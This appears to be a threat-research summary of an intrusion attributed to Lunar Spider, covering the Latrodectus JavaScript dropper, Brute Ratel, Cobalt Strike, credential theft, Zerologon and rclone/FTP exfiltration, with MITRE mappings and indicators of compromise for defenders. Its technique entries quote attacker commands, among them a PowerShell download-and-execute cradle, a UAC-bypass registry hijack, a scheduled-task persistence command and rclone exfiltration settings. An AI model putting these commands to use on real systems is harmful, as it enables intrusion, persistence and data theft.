Threat Research

From a Single Click: How Lunar Spider Enabled a Near Two-Month Intrusion

TheDFIR
A Lunar Spider-linked Latrodectus JavaScript dropper (masquerading as a tax form) installed an MSI that deployed Brute Ratel, which in turn injected Latrodectus and enabled BackConnect VNC, leading to extensive discovery, credential theft (including from an unattend.xml and LSASS), lateral movement with Cobalt Strike, and data exfiltration via Rclone/FTP. The intrusion persisted nearly two months, leveraged tools like Zerologon exploits, Metasploit, and a custom .NET backdoor (lsassa.exe), and used domains/IPs such as workspacin.cloud, cloudmeri.com, and 45.129.199.214. #Latrodectus #BruteRatel #CobaltStrike #Rclone #cloudmeri.com

Keypoints

  • Initial access via a heavily obfuscated Latrodectus JavaScript (tax-themed) that downloaded an MSI from 91.194.11[.]64 and executed Brute Ratel via rundll32.
  • Brute Ratel loader injected Latrodectus into explorer.exe, which used BackConnect VNC to enable interactive access and file uploads/downloads.
  • Threat actor harvested credentials from unattend.xml (plaintext domain admin), browsers, LSASS, and backup software (Veeam-Get-Creds), enabling domain-wide privilege escalation and RDP access.
  • Extensive use of Cobalt Strike beacons (e.g., 45.129.199[.]214), process injection, PsExec, WMIC, Zerologon exploit (zero.exe), and other lateral movement techniques to compromise domain controllers, file servers, and backup servers.
  • Custom .NET backdoor (lsassa.exe) provided persistence via scheduled task and periodic C2 polling (cloudmeri.com), while Brute Ratel and additional badger DLLs were used for long-term access.
  • Data exfiltration occurred on day 20 using a renamed rclone binary and FTP (host 45.135.232.3, username J0eBidenAbrabdy1aS3ha2Yeami) over ~9 hours 46 minutes; no ransomware observed.
  • IOC-rich environment with multiple C2 domains/IPs, YARA/Sigma detections, and evidence of cleanup (file deletion) and long dwell time (~2 months) before eviction.

MITRE Techniques

  • [T1189 ] Drive-by Compromise – Malicious JavaScript masquerading as a tax form downloaded an MSI from “hxxp://91.194.11[.]64/MSI.msi” which installed the next stage (“…performed an HTTP request to the URL hxxp://91.194.11[.]64/MSI.msi to install the next stage…”).
  • [T1059.007 ] JavaScript – The initial loader was a heavily obfuscated Latrodectus JavaScript file that executed only deobfuscated lines to trigger MSI download (“…deobfuscation workflow was identified, executing all the lines of code starting with ////”).
  • [T1218.011 ] Rundll32 – MSI executed embedded DLL via rundll32 to invoke malicious exported functions (e.g., “rundll32 upfilles.dll,stow”, “rundll32 wscadminui.dll, wsca”).
  • [T1055 ] Process Injection – Brute Ratel and Cobalt Strike injected payloads into legitimate processes (e.g., “injected Latrodectus malware into the explorer.exe process” and “injected Cobalt Strike beacons into spoolsv.exe”).
  • [T1078.002 ] Domain Accounts – Threat actor used plaintext domain admin credentials obtained from unattend.xml to authenticate as Domain Admin (“…discovered and accessed an unattend.xml Windows Answer file containing plaintext domain administrator credentials…”).
  • [T1547.001 ] Registry Run Keys / Startup Folder – Persistence via a Registry Run key named Update to execute Brute Ratel badger on startup (“…created a Run key, with an innocuous name of Update, which would execute the Brute Ratel badger…”).
  • [T1053.005 ] Scheduled Task – Custom .NET backdoor created a scheduled task for persistence (“schtasks /create /tn “SchedulerLsass” /tr “%ALLUSERSPROFILE%USOSharedlsassa.exe” /sc onstart”).
  • [T1003.001 ] LSASS Memory – Credentials harvested from LSASS via injected processes and Cobalt Strike-assisted access (“All instances of LSASS access followed the same pattern… facilitated via a Cobalt Strike beacon process”).
  • [T1555.003 ] Credentials from Web Browsers – Latrodectus stealer module targeted Chromium-based browsers and Firefox to extract stored credentials and cookies (“…capable of harvesting credentials from 29+ Chromium-based browsers… Firefox … targeting cookies.sqlite”).
  • [T1552.001 ] Credentials in Files – Threat actor retrieved plaintext domain admin credentials from unattend.xml answer file (“…collected the file via Backconnect (using the GET C:Unattend.xml command) and was able to access the plain-text domain admin credentials…”).
  • [T1548.002 ] Bypass User Account Control – Cobalt Strike stager performed UAC bypass via ms-settings protocol hijack and elevated token duplication (“reg add “HKCUSoftwareClassesms-settingsshellopencommand” … IEX …; privilege escalation through execution of ComputerDefaults.exe…”).
  • [T1086/T1059.001 ] PowerShell / Command and Scripting Interpreter – Multiple PowerShell download-execute cradles used (e.g., Veeam-Get-Creds invocation and ms-settings PowerShell payloads: “IEX (New-Object Net.Webclient).DownloadString(‘hxxp://127.0.0[.]1:24003/’); Veeam-Get-Creds.ps1”).
  • [T1570 ] Lateral Tool Transfer – Tools and payloads moved across hosts (Brute Ratel, Cobalt Strike beacons, zero.exe, rustscan, rclone) via PsExec, RDP, and file uploads (“…used PsExec to remotely deploy Cobalt Strike DLL beacons… deployed zero.exe and rustscan to other hosts…”).
  • [T1021.001 ] Remote Desktop Protocol – Threat actor used RDP with harvested Domain Admin credentials to access additional servers (“…returned using RDP to access a new server… RDP logon to a file share server where they also deployed Cobalt Strike”).
  • [T1210 ] Exploitation of Remote Services (Zerologon) – Custom zero.exe exploited CVE-2020-1472 to attempt lateral movement to a second domain controller (“…used the Zerologon (CVE-2020-1472) vulnerability to attempt additional lateral movement…”).
  • [T1048.003 ] Exfiltration Over Unencrypted Non-C2 Protocol – Data exfiltrated using rclone over FTP to remote host 45.135.232[.]3 (“…deployed … renamed rclone binary to exfiltrate the data… used FTP to send data… to the threat actor’s remote host”).
  • [T1105 ] Ingress Tool Transfer – Multiple tools downloaded/executed on hosts (MSI, Brute Ratel DLLs, Cobalt Strike stagers, rclone, rustscan) via BackConnect and other channels (“…uploaded additional malware to the beachhead host… downloaded the stealer module fxrm_vn_9.557302425.bin”).
  • [T1070.004 ] File Deletion – Threat actor deleted many downloaded files and tools to hinder analysis (“…deleted more than half of the files and tools that had been downloaded on the compromised hosts.”).

Indicators of Compromise

  • [Domains ] C2 and infrastructure – workspacin.cloud, cloudmeri.com, avtechupdate.com (examples of Latrodectus, lsassa backdoor, and Cobalt Strike C2s)
  • [IP Addresses ] C2 and hosting – 45.129.199.214 (Cobalt Strike), 91.194.11.64 (MSI stage), 45.135.232.3 (Rclone FTP host)
  • [File Names ] Payloads and tools observed – Form_W-9_Ver-i40_53b043910-86g91352u7972-6495q3.js (Latrodectus dropper), upfilles.dll / wscadminui.dll (Brute Ratel badgers), lsassa.exe (custom .NET backdoor), sys.dll / cron801.dl_ / system.dl_ (Cobalt Strike stagers)
  • [Hashes ] Sample file hashes for key binaries – sys.dll: ad3c52316e00…, upfilles.dll: ccb6d3cb020f…, (and additional hashes listed such as lsassa.exe and rclone-related files)
  • [Tools/Utilities ] Exfiltration & scanning utilities – renamed rclone (sihosts.exe) with rclone.conf (host=45.135.232.3, user=J0eBidenAbrabdy1aS3ha2Yeami), rustscan.exe (example hash 9eaa8464…)

Read more: https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/